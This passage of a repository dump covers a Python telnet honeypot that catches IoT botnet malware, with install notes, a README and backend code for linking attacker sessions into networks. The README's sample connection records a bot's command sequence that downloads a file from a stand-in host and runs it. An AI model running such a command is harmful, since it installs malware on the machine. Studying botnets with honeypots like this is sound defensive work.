Showing preview only (331K chars total). Download the full file or copy to clipboard to get everything.
Repository: Phype/telnet-iot-honeypot
Branch: master
Commit: 5d32829a36b5
Files: 82
Total size: 309.8 KB
Directory structure:
gitextract_2jzluwq6/
├── .gitignore
├── Dockerfile
├── INSTALL.md
├── README.md
├── backend/
│ ├── __init__.py
│ ├── additionalinfo.py
│ ├── authcontroller.py
│ ├── backend.py
│ ├── clientcontroller.py
│ ├── cuckoo.py
│ ├── db.py
│ ├── ipdb/
│ │ ├── .gitignore
│ │ ├── __init__.py
│ │ └── ipdb.py
│ ├── virustotal.py
│ ├── virustotal_fill_db.py
│ └── webcontroller.py
├── backend.py
├── config.dist.yaml
├── create_config.sh
├── create_docker.sh
├── honeypot/
│ ├── __init__.py
│ ├── __main__.py
│ ├── client.py
│ ├── sampledb_client.py
│ ├── session.py
│ ├── shell/
│ │ ├── __init__.py
│ │ ├── commands/
│ │ │ ├── __init__.py
│ │ │ ├── base.py
│ │ │ ├── binary.py
│ │ │ ├── cmd_util.py
│ │ │ ├── shell.py
│ │ │ ├── shellcode.py
│ │ │ ├── tftp.py
│ │ │ └── wget.py
│ │ ├── grammar.peg
│ │ ├── grammar.py
│ │ ├── shell.py
│ │ ├── test.sh
│ │ └── test.txt
│ └── telnet.py
├── honeypot.py
├── html/
│ ├── .gitignore
│ ├── admin.html
│ ├── asn.html
│ ├── common.js
│ ├── connection.html
│ ├── connectionlist-embed.html
│ ├── connectionlist.html
│ ├── countries.js
│ ├── fancy/
│ │ ├── connhash/
│ │ │ └── index.html
│ │ └── graph/
│ │ └── index.html
│ ├── img/
│ │ ├── LICENSE
│ │ └── flags/
│ │ └── LICENSE
│ ├── index.html
│ ├── js/
│ │ └── angular-vis.js
│ ├── network.html
│ ├── networks.html
│ ├── overview.html
│ ├── sample.html
│ ├── sample.js
│ ├── samples.html
│ ├── tag.html
│ ├── tags.html
│ ├── url.html
│ └── urls.html
├── requirements.txt
├── tftpy/
│ ├── TftpClient.py
│ ├── TftpContexts.py
│ ├── TftpPacketFactory.py
│ ├── TftpPacketTypes.py
│ ├── TftpServer.py
│ ├── TftpShared.py
│ ├── TftpStates.py
│ └── __init__.py
├── util/
│ ├── __init__.py
│ ├── config.py
│ └── dbg.py
└── vagrant/
├── .gitignore
├── mariadb/
│ ├── Vagrantfile
│ └── mysql.sh
└── sqlite/
└── Vagrantfile
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
*.pyc
*.db
samples/
Mirai-Source-Code-master/
obf.py
import-lost-conns.py
import-length.py
review-sampels.py
*.kate-swp
*.sql
*.log
config.yaml
================================================
FILE: Dockerfile
================================================
FROM python:2
WORKDIR /usr/src/app
COPY ./requirements.txt ./
RUN pip install --no-cache-dir -r requirements.txt
RUN pip install mysqlclient
COPY . .
RUN apt update && apt install -y sqlite3
================================================
FILE: INSTALL.md
================================================
# Installation
For installation instructions, go to section Manual installation.
However, if you just want to get everythig running, there is
also a Vagrantfile. See Section Vagrent for that.
# Vagrant
There is a Vagrantfile in the folder vagrant/ you can use to just make
a basic deployment with honeypot + backend + sqlite running.
Install vagrant and vagrant virtualbox porvider,
then go to vagrant folder and type `vagrant up`.
After a while the box should run a honeypot + backend available
via port-forwarding at `http://localhost:5000/` and `telnet://localhost:2223`.
# Manual installation
confirmed to work with Ubuntu 16.04.2 LTS
Install all requirements:
```
apt-get install -y python-pip libmysqlclient-dev python-mysqldb git sqlite3
git clone https://github.com/Phype/telnet-iot-honeypot.git
cd telnet-iot-honeypot
pip install -r requirements.txt
```
sudo apt-get install python-setuptools python-werkzeug \
python-flask python-flask-httpauth python-sqlalchemy \
python-requests python-decorator python-dnspython \
python-ipaddress python-simpleeval python-yaml
If you want to use mysql, create a mysql database. Default mysql max key length is 767 bytes,
so it is recommended to use latin1 charset, else the db setup will fail.
```
apt-get install mysql-server mysql-client
sudo mysql_secure_installation
mysql
CREATE DATABASE telhoney CHARACTER SET latin1 COLLATE latin1_swedish_ci;
grant all privileges on telhoney.* to telhoney@localhost identified by "YOUR_PASSWORD";
flush privileges;
```
## Configuration
This software consists of 2 components, a honeypot (client) and a backend (server).
The honeypot will accept incoming telnet connections and may download samples
which an adversary may try to download in the telnet session. When a session is
closed, the honeypot will post all data about the connection to the backend using
a REST-API.
The configuration for both honeypot and backend is in the files
`config.dist.yaml` and `config.yaml`. The `config.dist.yaml` contains the default
config. If you want to change anything, change or create overriding entries in
`config.yaml`. If you need documentation about the configuration,
the file `config.dist.yaml` contains some comments.
The REST-API requires authentification (HTTP Basic Auth).
When the backend is started for the first time,
it will create a "users" table in the database containing an "admin" user.
The admin users password is read from the configuration file.
If this file is empty, it will be created with random credentials.
*TL;DR*: The default config should just work, if you need the credentials for the
admin user, see the file `config.yaml`.
## Running
Create a config:
bash create_config.sh
Start the backend:
python backend.py
Now, start the honeypot:
python honeypot.py
Now, you can test the honeypot
telnet 127.0.0.1 2223
## HTML Frontend
You can use the frontend by just opening the file html/index.html in your browser.
If you want to make the frontend publically available, deploy the html/ folder to you webserver,
or install one:
```
sudo apt-get install apache2
cd telnet-iot-honeypot
cp -R html /var/www
sudo chown www-data:www-data /var/www -R
```
## Virustotal integration
Please get yout own virustotal key,
since mine only allows for 4 API Req/min.
For how to do this, see https://www.virustotal.com/de/faq/#virustotal-api
When you got one, put it in your config.yamland enable virustotal integration:
vt_key: "GET_YOUR_OWN"
submit_to_vt: true
If you want to import virustotal reports of the collected samples,
run (may have to restart because of db locks). *TODO*: test if this still works
python virustotal_fill_db.php
================================================
FILE: README.md
================================================
## Disclaimer
This project neither supported or in development anymore. It is based on python2 which has reached its EOL in 2020 and uses dependencies which are getting harder to install over time. Use at your own risk!
# Telnet IoT honeypot
'Python telnet honeypot for catching botnet binaries'
This project implements a python telnet server trying to act
as a honeypot for IoT Malware which spreads over horribly
insecure default passwords on telnet servers on the internet.
The honeypot works by emulating a shell enviroment, just like
cowrie (https://github.com/micheloosterhof/cowrie).
The aim of this project is primarily to automatically analyse
Botnet connections and "map" Botnets by linking diffrent
connections and even Networks together.
## Architecture
The application has a client/server architecture,
with a client (the actual honeypot) accepting telnet connections
and a server which receives information about connections and
does the analysis.
The backend server exposes a HTTP interface which is used
to access to frontend as well as by the clients to push new
Connection information to the backend.
## Automatic analysis
The Backend uses 2 diffrent mechanisms to automatically link
connections:
### Networks
Networks are discovered Botnets. A network is the set of all linked
connections, urls and samples. Urls and samples
are linked when they are used in a connection. Two connections are linked
when both connections are recieved by the same honeypot client
(mutliple clients are supported!) and use the same credentials in a short
period of time (defautl 2 minutes) or come from the same IP address.
### Malware
Multiple networks are identified to use the same type of malware
if the text entered during sessions of the networks aro mostly the
same. This comparison is done using sort of "hash"-function which
basically translates a session (or connection) into a sequence
of words and then maps each word to a single byte so this resulting
sequence of bytes can be easily searched.
# Running
The application has a config file named config.py.
Samples are included for local and client/server deployments.
## Configuration
The backend requires a SQL-database (default sqlite) which is initialized
at first run. Before the first run you should generate a admin account
which is used to generate more users. The admin account can also directly
used by a client to post connections. When more than one honeypots shall be
connected, creating multiple users is recommended.
bash create_config.sh
Both client and backend will read the files `config.yaml` and `config.dist.yaml`
to read configuration parameters. The `config.dist.yaml` file includes
default values for all but admin user credentials and these parameters
are overwirtten by entries in the `config.yaml` file.
## Running the Server
python backend.py
## Running the Client
This project contains an own honeypot, however because of the client-server architecture,
other honeypot can be used as well.
### Using the built-in honeypot
python honeypot.py
The client cannot be started without the server running. To use a diffrent configuration
for the client you can use the `-c` switch like this:
python honeypot.py -c myconfig.yaml
If you only want to check the honeypot functionality,
you can start the client in interactive mode:
python honeypot shell
### Using cowrie
I wrote an output plugin for cowrie, which has much more features than the built in honeypot.
If you want to use cowrie instead, checkout my fork which includes the output module here:
https://github.com/Phype/cowrie .
## Opening the frontend
After the server is started, open `http://127.0.0.1/` in your favorite browser.
## Sample Connection
enable
shell
sh
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit
## Images



================================================
FILE: backend/__init__.py
================================================
================================================
FILE: backend/additionalinfo.py
================================================
import dns.resolver
import ipaddress
import urlparse
import re
import traceback
import ipdb.ipdb
def filter_ascii(string):
string = ''.join(char for char in string if ord(char) < 128 and ord(char) > 32 or char in "\r\n ")
return string
def query_txt(cname):
try:
answer = dns.resolver.query(filter_ascii(cname), "TXT")
for rr in answer.rrset:
if rr.strings: return rr.strings[0]
except Exception as e:
traceback.print_exc()
pass
return None
def query_a(cname):
try:
answer = dns.resolver.query(filter_ascii(cname), "A")
for data in answer:
if data.address: return data.address
except:
traceback.print_exc()
pass
return None
def txt_to_ipinfo(txt):
parts = txt.split("|")
return {
"asn": filter_ascii(parts[0].strip()),
"ipblock": filter_ascii(parts[1].strip()),
"country": filter_ascii(parts[2].strip()),
"reg": filter_ascii(parts[3].strip()),
"updated": filter_ascii(parts[4].strip())
}
def txt_to_asinfo(txt):
parts = txt.split("|")
return {
"asn": filter_ascii(parts[0].strip()),
"country": filter_ascii(parts[1].strip()),
"reg": filter_ascii(parts[2].strip()),
"updated": filter_ascii(parts[3].strip()),
"name": filter_ascii(parts[4].strip())
}
def get_ip4_info(ip):
oktets = ip.split(".")
reverse = oktets[3] + "." + oktets[2] + "." + oktets[1] + "." + oktets[0]
answer = query_txt(reverse + ".origin.asn.cymru.com")
if answer:
return txt_to_ipinfo(answer)
return None
def get_ip6_info(ip):
ip = ipaddress.ip_address(unicode(ip))
ip = list(ip.exploded.replace(":", ""))
ip.reverse()
reverse = ".".join(ip)
answer = query_txt(reverse + ".origin6.asn.cymru.com")
if answer:
return txt_to_ipinfo(answer)
return None
def get_ip_info(ip):
is_v4 = "." in ip
is_v6 = ":" in ip
if is_v4:
return get_ip4_info(ip)
elif is_v6:
return get_ip6_info(ip)
else:
print("Cannot parse ip " + ip)
return None
def get_asn_info(asn):
answer = query_txt("AS" + str(asn) + ".asn.cymru.com")
if answer:
return txt_to_asinfo(answer)
return None
def get_url_info(url):
try:
parsed = urlparse.urlparse(url)
netloc = parsed.netloc
ip = None
# IPv6
if "[" in netloc:
netloc = re.match("\\[(.*)\\]", netloc).group(1)
ip = netloc
# IPv4 / domain name
else:
if ":" in netloc:
netloc = re.match("(.*?):", netloc).group(1)
if re.match("[a-zA-Z]", netloc):
ip = query_a(netloc)
else:
ip = netloc
return ip, get_ip_info(ip)
except:
traceback.print_exc()
pass
return None
if __name__ == "__main__":
print get_ip_info("79.220.249.125")
print get_ip_info("2a00:1450:4001:81a::200e")
print get_asn_info(3320)
print get_url_info("http://google.com")
print get_url_info("http://183.144.16.51:14722/.i")
print get_url_info("http://[::1]:14722/.i")
================================================
FILE: backend/authcontroller.py
================================================
import os
import hashlib
import traceback
import struct
import json
import time
import additionalinfo
import ipdb.ipdb
from sqlalchemy import desc, func, and_, or_
from decorator import decorator
from functools import wraps
from simpleeval import simple_eval
from argon2 import argon2_hash
from db import get_db, filter_ascii, Sample, Connection, Url, ASN, Tag, User, Network, Malware, IPRange, db_wrapper
from virustotal import Virustotal
from cuckoo import Cuckoo
from util.dbg import dbg
from util.config import config
from difflib import ndiff
class AuthController:
def __init__(self):
self.session = None
self.salt = config.get("backend_salt")
self.checkInitializeDB()
def pwhash(self, username, password):
return argon2_hash(str(password), self.salt + str(username), buflen=32).encode("hex")
@db_wrapper
def checkInitializeDB(self):
user = self.session.query(User).filter(User.id == 1).first()
if user == None:
admin_name = config.get("backend_user")
admin_pass = config.get("backend_pass")
print 'Creating admin user "' + admin_name + '" see config for password'
self.addUser(admin_name, admin_pass, 1)
@db_wrapper
def getUser(self, username):
user = self.session.query(User).filter(User.username == username).first()
return user.json(depth=1) if user else None
@db_wrapper
def addUser(self, username, password, id=None):
user = User(username=username, password=self.pwhash(username, password))
if id != None:
user.id = id
self.session.add(user)
return user.json()
@db_wrapper
def checkAdmin(self, user):
user = self.session.query(User).filter(User.username == user).first()
if user == None:
return False
return user.id == 1
@db_wrapper
def checkLogin(self, username, password):
user = self.session.query(User).filter(User.username == username).first()
if user == None:
return False
if self.pwhash(username, password) == user.password:
return True
else:
return False
================================================
FILE: backend/backend.py
================================================
from flask import Flask, request, Response, redirect, send_from_directory
from flask_httpauth import HTTPBasicAuth
from flask_socketio import SocketIO
auth = HTTPBasicAuth()
from db import get_db
from clientcontroller import ClientController
from webcontroller import WebController
from authcontroller import AuthController
from util.config import config
import os
import json
import base64
import time
import signal
app = Flask(__name__)
ctrl = ClientController()
web = WebController()
authctrl = AuthController()
socketio = SocketIO(app)
app.debug = True
def red(obj, attributes):
if not obj:
return None
res = {}
for a in attributes:
if a in obj:
res[a] = obj[a]
return res
###
#
# Globals
#
###
SECS_PER_MONTH = 3600 * 24 * 31
@app.after_request
def add_cors(response):
response.headers["Access-Control-Allow-Origin"] = "*"
response.headers["Access-Control-Allow-Methods"] = "GET, POST, PUT, DELETE"
response.headers["Access-Control-Allow-Headers"] = "Authorization, Content-type"
return response
@auth.verify_password
def verify_password(username, password):
return authctrl.checkLogin(username, password)
###
#
# Index
#
###
@app.route('/')
def send_index():
return redirect('/html/index.html')
@app.route('/html/<path:filename>')
def serve_static(filename):
root_dir = os.getcwd()
return send_from_directory(os.path.join(root_dir, 'html'), filename)
###
#
# Admin API
#
###
@app.route("/user/<username>", methods = ["PUT"])
@auth.login_required
def add_user(username):
if authctrl.checkAdmin(auth.username()):
user = request.json
if user["username"] != username:
return "username mismatch in url/data", 500
return json.dumps(authctrl.addUser(user["username"], user["password"]))
else:
return "Authorization required", 401
###
#
# Upload API
#
###
@app.route("/login")
@auth.login_required
def test_login():
return "LOGIN OK"
@app.route("/conns", methods = ["PUT"])
@auth.login_required
def put_conn():
session = request.json
session["backend_username"] = auth.username()
print("--- PUT SESSION ---")
print(json.dumps(session))
session = ctrl.put_session(session)
socketio.emit('session', session)
return json.dumps(session)
@app.route("/sample/<sha256>", methods = ["PUT"])
@auth.login_required
def put_sample_info(sha256):
sample = request.json
return json.dumps(ctrl.put_sample_info(sample))
@app.route("/sample/<sha256>/update", methods = ["GET"])
@auth.login_required
def update_sample(sha256):
return json.dumps(ctrl.update_vt_result(sha256))
@app.route("/file", methods = ["POST"])
@auth.login_required
def put_sample():
data = request.get_data()
return json.dumps(ctrl.put_sample(data))
###
#
# Public API
#
###
def fail(msg = "", code = 400):
obj = {"ok" : False, "msg" : msg}
return Response(json.dumps(obj), status=code, mimetype='application/json')
### Networks
@app.route("/housekeeping", methods = ["GET"])
def housekeeping():
ctrl.do_housekeeping()
return "DONE"
@app.route("/networks", methods = ["GET"])
def get_networks():
return json.dumps(web.get_networks())
@app.route("/network/<net_id>", methods = ["GET"])
def get_network(net_id):
return json.dumps(web.get_network(net_id))
@app.route("/network/<net_id>/locations", methods = ["GET"])
def get_network_locations(net_id):
now = int(time.time())
loc = web.get_connection_locations(now - SECS_PER_MONTH, now, int(net_id))
return json.dumps(loc)
@app.route("/network/<net_id>/history", methods = ["GET"])
def get_network_history(net_id):
not_before = request.args.get("not_before")
not_after = request.args.get("not_after")
if not_before == None or not_after == None:
not_after = int(time.time())
not_before = not_after - SECS_PER_MONTH
else:
not_before = int(not_before)
not_after = int(not_after)
d = web.get_network_history(not_before, not_after, int(net_id))
return json.dumps(d)
@app.route("/network/biggest_history", methods = ["GET"])
def get_network_biggest_history():
not_before = request.args.get("not_before")
not_after = request.args.get("not_after")
if not_before == None or not_after == None:
not_after = int(time.time())
not_before = not_after - SECS_PER_MONTH
else:
not_before = int(not_before)
not_after = int(not_after)
d = web.get_biggest_networks_history(not_before, not_after)
return json.dumps(d)
### Malwares
@app.route("/malwares", methods = ["GET"])
def get_malwares():
return json.dumps(web.get_malwares())
### Samples
@app.route("/sample/<sha256>")
def get_sample(sha256):
sample = web.get_sample(sha256)
if sample:
return json.dumps(sample)
else:
return "", 404
@app.route("/sample/newest")
def get_newest_samples():
samples = web.get_newest_samples()
return json.dumps(samples)
### Urls
@app.route("/url/<ref_enc>", methods = ["GET"])
def get_url(ref_enc):
ref = base64.b64decode(ref_enc)
print("\"" + ref_enc + "\" decodes to \"" + ref + "\"")
url = web.get_url(ref)
if url:
return json.dumps(url)
else:
return "", 404
@app.route("/url/newest")
def get_newest_urls():
urls = web.get_newest_urls()
return json.dumps(urls)
### connections
@app.route("/connection/<id>")
def get_connection(id):
conn = web.get_connection(id)
if conn:
return json.dumps(conn)
else:
return "", 404
@app.route("/connections")
def get_connections():
obj = {}
allowed_keys = ["ipblock", "user", "password", "ip", "country", "asn_id", "network_id"]
for k,v in request.args.iteritems():
if k in allowed_keys:
obj[k] = v
conn = web.get_connections(obj, request.args.get("older_than", None))
if conn:
return json.dumps(conn)
else:
return "", 404
@app.route("/connections_fast")
def get_connections_fast():
conn = web.get_connections_fast()
if conn:
return json.dumps(conn)
else:
return "", 404
@app.route("/connection/statistics/per_country")
def get_country_stats():
stats = web.get_country_stats()
return json.dumps(stats)
@app.route("/connection/by_country/<country>")
def get_country_connections(country):
older_than = request.args.get('older_than', None)
stats = web.get_country_connections(country, older_than)
return json.dumps(stats)
@app.route("/connection/by_ip/<ip>")
def get_ip_connections(ip):
older_than = request.args.get('older_than', None)
stats = web.get_ip_connections(ip, older_than)
return json.dumps(stats)
@app.route("/connection/newest")
def get_newest_connections():
connections = web.get_newest_connections()
return json.dumps(connections)
@app.route("/connection/locations")
def get_connection_locations():
now = int(time.time())
loc = web.get_connection_locations(now - SECS_PER_MONTH, now)
return json.dumps(loc)
### Tags
@app.route("/tag/<name>")
def get_tag(name):
tag = web.get_tag(name)
if tag:
return json.dumps(tag)
else:
return "", 404
@app.route("/tags")
def get_tags():
tags = web.get_tags()
return json.dumps(tags)
### Hist
@app.route("/connhashtree/<layers>")
def connhash_tree(layers):
return json.dumps(web.connhash_tree(int(layers)))
### ASN
@app.route("/asn/<asn>")
def get_asn(asn):
info = web.get_asn(asn)
if not info:
return "", 404
return json.dumps(info)
def run():
signal.signal(15, stop)
app.run(host=config.get("http_addr"), port=config.get("http_port"),threaded=True)
#socketio.run(app, host=config.get("http_addr"), port=config.get("http_port"))
def stop():
print "asdasdasd"
if __name__ == "__main__":
run()
================================================
FILE: backend/clientcontroller.py
================================================
import os
import hashlib
import traceback
import struct
import json
import time
import socket
import urlparse
import random
import additionalinfo
import ipdb.ipdb
from sqlalchemy import desc, func, and_, or_
from decorator import decorator
from functools import wraps
from simpleeval import simple_eval
from argon2 import argon2_hash
from db import get_db, filter_ascii, Sample, Connection, Url, ASN, Tag, User, Network, Malware, IPRange, db_wrapper
from virustotal import Virustotal
from cuckoo import Cuckoo
from util.dbg import dbg
from util.config import config
from difflib import ndiff
ANIMAL_NAMES = ["Boar","Stallion","Yak","Beaver","Salamander","Eagle Owl","Impala","Elephant","Chameleon","Argali","Lemur","Addax","Colt",
"Whale","Dormouse","Budgerigar","Dugong","Squirrel","Okapi","Burro","Fish","Crocodile","Finch","Bison","Gazelle","Basilisk",
"Puma","Rooster","Moose","Musk Deer","Thorny Devil","Gopher","Gnu","Panther","Porpoise","Lamb","Parakeet","Marmoset","Coati",
"Alligator","Elk","Antelope","Kitten","Capybara","Mule","Mouse","Civet","Zebu","Horse","Bald Eagle","Raccoon","Pronghorn",
"Parrot","Llama","Tapir","Duckbill Platypus","Cow","Ewe","Bighorn","Hedgehog","Crow","Mustang","Panda","Otter","Mare",
"Goat","Dingo","Hog","Mongoose","Guanaco","Walrus","Springbok","Dog","Kangaroo","Badger","Fawn","Octopus","Buffalo","Doe",
"Camel","Shrew","Lovebird","Gemsbok","Mink","Lynx","Wolverine","Fox","Gorilla","Silver Fox","Wolf","Ground Hog","Meerkat",
"Pony","Highland Cow","Mynah Bird","Giraffe","Cougar","Eland","Ferret","Rhinoceros"]
# Controls Actions perfomed by Honeypot Clients
class ClientController:
def __init__(self):
self.session = None
if config.get("submit_to_vt"):
self.vt = Virustotal(config.get("vt_key", optional=True))
else:
self.vt = None
self.cuckoo = Cuckoo(config)
self.do_ip_to_asn_resolution = False
self.ip2asn = config.get("ip_to_asn_resolution", optional=True, default=True)
if self.ip2asn == "offline":
self.do_ip_to_asn_resolution = True
self.fill_db_ipranges()
if self.ip2asn == "online":
self.do_ip_to_asn_resolution = True
@db_wrapper
def _get_asn(self, asn_id):
asn_obj = self.session.query(ASN).filter(ASN.asn == asn_id).first()
if asn_obj:
return asn_obj
else:
asn_info = additionalinfo.get_asn_info(asn_id)
if asn_info:
asn_obj = ASN(asn=asn_id, name=asn_info['name'], reg=asn_info['reg'], country=asn_info['country'])
self.session.add(asn_obj)
return asn_obj
return None
def calc_connhash_similiarity(self, h1, h2):
l = min(len(h1), len(h2))
r = 0
for i in range(0, l):
r += int(h1[i] != h2[i])
if l == 0: return 0
return float(r)/float(l)
def calc_connhash(self, stream):
output = ""
for event in stream:
if event["in"]:
line = event["data"]
line = line.strip()
parts = line.split(" ")
for part in parts:
part_hash = chr(hash(part) % 0xFF)
output += part_hash
# Max db len is 256, half because of hex encoding
return output[:120]
@db_wrapper
def fill_db_ipranges(self):
if self.session.query(IPRange.ip_min).count() != 0:
return
print "Filling IPRange Tables"
asntable = ipdb.ipdb.get_asn()
progress = 0
for row in ipdb.ipdb.get_geo_iter():
progress += 1
if progress % 1000 == 0:
self.session.commit()
self.session.flush()
print str(100.0 * float(row[0]) / 4294967296.0) + "% / " + str(100.0 * progress / 3315466) + "%"
ip = IPRange(ip_min = int(row[0]), ip_max=int(row[1]))
ip.country = row[2]
ip.region = row[4]
ip.city = row[5]
ip.zipcode = row[8]
ip.timezone = row[9]
ip.latitude = float(row[6])
ip.longitude = float(row[7])
asn_data = asntable.find_int(ip.ip_min)
if asn_data:
asn_id = int(asn_data[3])
asn_db = self.session.query(ASN).filter(ASN.asn == asn_id).first()
if asn_db == None:
asn_db = ASN(asn = asn_id, name = asn_data[4], country=ip.country)
self.session.add(asn_db)
ip.asn = asn_db
# Dont add session if we cannot find an asn for it
self.session.add(ip)
print "IPranges loaded"
@db_wrapper
def get_ip_range_offline(self, ip):
ip_int = ipdb.ipdb.ipstr2int(ip)
range = self.session.query(IPRange).filter(and_(IPRange.ip_min <= ip_int,
ip_int <= IPRange.ip_max)).first()
return range
def get_ip_range_online(self, ip):
addinfo = additionalinfo.get_ip_info(ip)
if addinfo:
# TODO: Ugly hack
range = type('',(object,),{})()
range.country = addinfo["country"]
range.city = "Unknown"
range.latitude = 0
range.longitude = 0
range.asn_id = int(addinfo["asn"])
range.asn = self._get_asn(range.asn_id)
range.cidr = addinfo["ipblock"]
return range
else:
return None
def get_ip_range(self, ip):
if self.ip2asn == "online":
return self.get_ip_range_online(ip)
else:
return self.get_ip_range_offline(ip)
def get_url_info(self, url):
parsed = urlparse.urlparse(url)
host = parsed.netloc.split(':')[0]
if host[0].isdigit():
ip = host
else:
try:
ip = socket.gethostbyname(host)
except:
return None
range = self.get_ip_range(ip)
return ip, range
@db_wrapper
def do_housekeeping(self):
for malware in self.session.query(Malware).all():
malware.name = random.choice(ANIMAL_NAMES)
# rebuild nb_firstconns
if False:
net_cache = {}
for conn in self.session.query(Connection).all():
if len(conn.conns_before) == 0:
if conn.network_id in net_cache:
net_cache[conn.network_id] += 1
else:
net_cache[conn.network_id] = 1
for network in self.session.query(Network).all():
if network.id in net_cache:
network.nb_firstconns = net_cache[network.id]
else:
network.nb_firstconns = 0
print "Net " + str(network.id) + ": " + str(network.nb_firstconns)
@db_wrapper
def put_session(self, session):
connhash = self.calc_connhash(session["stream"]).encode("hex")
backend_user = self.session.query(User).filter(
User.username == session["backend_username"]).first()
conn = Connection(ip=session["ip"], user=session["user"],
date=session["date"], password=session["pass"],
stream=json.dumps(session["stream"]),
connhash=connhash, backend_user_id=backend_user.id)
conn.user = filter_ascii(conn.user)
conn.password = filter_ascii(conn.password)
if self.do_ip_to_asn_resolution:
range = self.get_ip_range(conn.ip)
if range:
conn.country = range.country
conn.city = range.city
conn.lat = range.latitude
conn.lon = range.longitude
conn.asn = range.asn
self.session.add(conn)
self.session.flush() # to get id
network_id = None
samples = []
urls = []
for sample_json in session["samples"]:
# Ignore junk - may clean up the db a bit
if sample_json["length"] < 2000:
continue
sample, url = self.create_url_sample(sample_json)
if sample:
if network_id == None and sample.network_id != None:
network_id = sample.network_id
samples.append(sample)
if url:
if network_id == None and url.network_id != None:
network_id = url.network_id
conn.urls.append(url)
urls.append(url)
# Find previous connections
# A connection is associated when:
# - same honeypot/user
# - connection happened as long as 120s before
# - same client ip OR same username/password combo
assoc_timediff = 120
assoc_timediff_sameip = 3600
previous_conns = (self.session.query(Connection).
filter(
or_(
and_(
Connection.date > (conn.date - assoc_timediff),
Connection.user == conn.user,
Connection.password == conn.password
),
and_(
Connection.date > (conn.date - assoc_timediff_sameip),
Connection.ip == conn.ip
)
),
Connection.backend_user_id == conn.backend_user_id,
Connection.id != conn.id).all())
for prev in previous_conns:
if network_id == None and prev.network_id != None:
network_id = prev.network_id
conn.conns_before.append(prev)
# Check connection against all tags
tags = self.session.query(Tag).all()
for tag in tags:
json_obj = conn.json(depth = 0)
json_obj["text_combined"] = filter_ascii(json_obj["text_combined"])
if simple_eval(tag.code, names=json_obj) == True:
self.db.link_conn_tag(conn.id, tag.id)
# Only create new networks for connections with urls or associtaed conns,
# to prevent the creation of thousands of networks
# NOTE: only conns with network == NULL will get their network updated
# later so whe should only create a network where we cannot easily
# change it later
haslogin = conn.user != None and conn.user != ""
if (len(conn.urls) > 0 or len(previous_conns) > 0) and network_id == None and haslogin:
print(" --- create network --- ")
network_id = self.create_network().id
# Update network on self
conn.network_id = network_id
# Update network on all added Urls
for url in urls:
if url.network_id == None:
url.network_id = network_id
# Update network on all added Samples
for sample in samples:
if sample.network_id == None:
sample.network_id = network_id
# Update network on all previous connections withut one
if network_id != None:
for prev in previous_conns:
if prev.network_id == None:
prev.network_id = network_id
# Update number of first conns on network
if len(prev.conns_before) == 0:
conn.network.nb_firstconns += 1
self.session.flush()
# Check for Malware type
# only if our network exists AND has no malware associated
if conn.network != None and conn.network.malware == None:
# Find connections with similar connhash
similar_conns = (self.session.query(Connection)
.filter(func.length(Connection.connhash) == len(connhash))
.all())
min_sim = 2
min_conn = None
for similar in similar_conns:
if similar.network_id != None:
c1 = connhash.decode("hex")
c2 = similar.connhash.decode("hex")
sim = self.calc_connhash_similiarity(c1, c2)
if sim < min_sim and similar.network.malware != None:
min_sim = sim
min_conn = similar
# 0.9: 90% or more words in session are equal
# think this is probably the same kind of malware
# doesn't need to be the same botnet though!
if min_sim < 0.9:
conn.network.malware = min_conn.network.malware
else:
conn.network.malware = Malware()
conn.network.malware.name = random.choice(ANIMAL_NAMES)
self.session.add(conn.network.malware)
self.session.flush()
# Update network number of first connections
if len(previous_conns) == 0 and conn.network_id != None:
conn.network.nb_firstconns += 1
return conn.json(depth=1)
@db_wrapper
def create_network(self):
net = Network()
self.session.add(net)
self.session.flush()
return net
def create_url_sample(self, f):
url = self.session.query(Url).filter(Url.url==f["url"]).first()
if url == None:
url_ip = None
url_asn = None
url_country = None
if self.do_ip_to_asn_resolution:
url_ip, url_range = self.get_url_info(f["url"])
if url_range:
url_asn = url_range.asn_id
url_country = url_range.country
url = Url(url=f["url"], date=f["date"], ip=url_ip, asn_id=url_asn, country=url_country)
self.session.add(url)
if f["sha256"] != None:
sample = self.session.query(Sample).filter(Sample.sha256 == f["sha256"]).first()
if sample == None:
result = None
try:
if self.vt != None:
vtobj = self.vt.query_hash_sha256(f["sha256"])
if vtobj:
result = str(vtobj["positives"]) + "/" + str(vtobj["total"]) + " " + self.vt.get_best_result(vtobj)
except:
pass
sample = Sample(sha256=f["sha256"], name=f["name"], length=f["length"],
date=f["date"], info=f["info"], result=result)
self.session.add(sample)
if sample.network_id != None and url.network_id == None:
url.network_id = sample.network_id
if sample.network_id == None and url.network_id != None:
sample.network_id = url.network_id
else:
sample = None
url.sample = sample
return sample, url
@db_wrapper
def put_sample(self, data):
sha256 = hashlib.sha256(data).hexdigest()
self.db.put_sample_data(sha256, data)
if config.get("cuckoo_enabled"):
self.cuckoo.upload(os.path.join(config.get("sample_dir"), sha256), sha256)
elif config.get("submit_to_vt"):
self.vt.upload_file(os.path.join(config.get("sample_dir"), sha256), sha256)
@db_wrapper
def update_vt_result(self, sample_sha):
sample = self.session.query(Sample).filter(Sample.sha256 == sample_sha).first()
if sample:
vtobj = self.vt.query_hash_sha256(sample_sha)
if vtobj:
sample.result = str(vtobj["positives"]) + "/" + str(vtobj["total"]) + " " + self.vt.get_best_result(vtobj)
return sample.json(depth=1)
return None
================================================
FILE: backend/cuckoo.py
================================================
import json
import os
try:
from urllib.parse import urlparse, urljoin
except ImportError:
from urlparse import urlparse, urljoin
import requests
from requests.auth import HTTPBasicAuth
from util.config import config
try:
import urllib3
urllib3.disable_warnings()
except (AttributeError, ImportError):
pass
class Cuckoo():
def __init__(self, config):
self.url_base = config.get("cuckoo_url_base")
self.api_user = config.get("cuckoo_user")
self.api_passwd = config.get("cuckoo_passwd")
self.cuckoo_force = config.get("cuckoo_force")
def upload(self, path, name):
if self.cuckoo_force or self.cuckoo_check_if_dup(os.path.basename(path)) is False:
print("Sending file to Cuckoo")
self.postfile(path, name)
def cuckoo_check_if_dup(self, sha256):
"""
Check if file already was analyzed by cuckoo
"""
try:
print("Looking for tasks for: {}".format(sha256))
res = requests.get(urljoin(self.url_base, "/files/view/sha256/{}".format(sha256)),
verify=False,
auth=HTTPBasicAuth(self.api_user,self.api_passwd),
timeout=60)
if res and res.ok and res.status_code == 200:
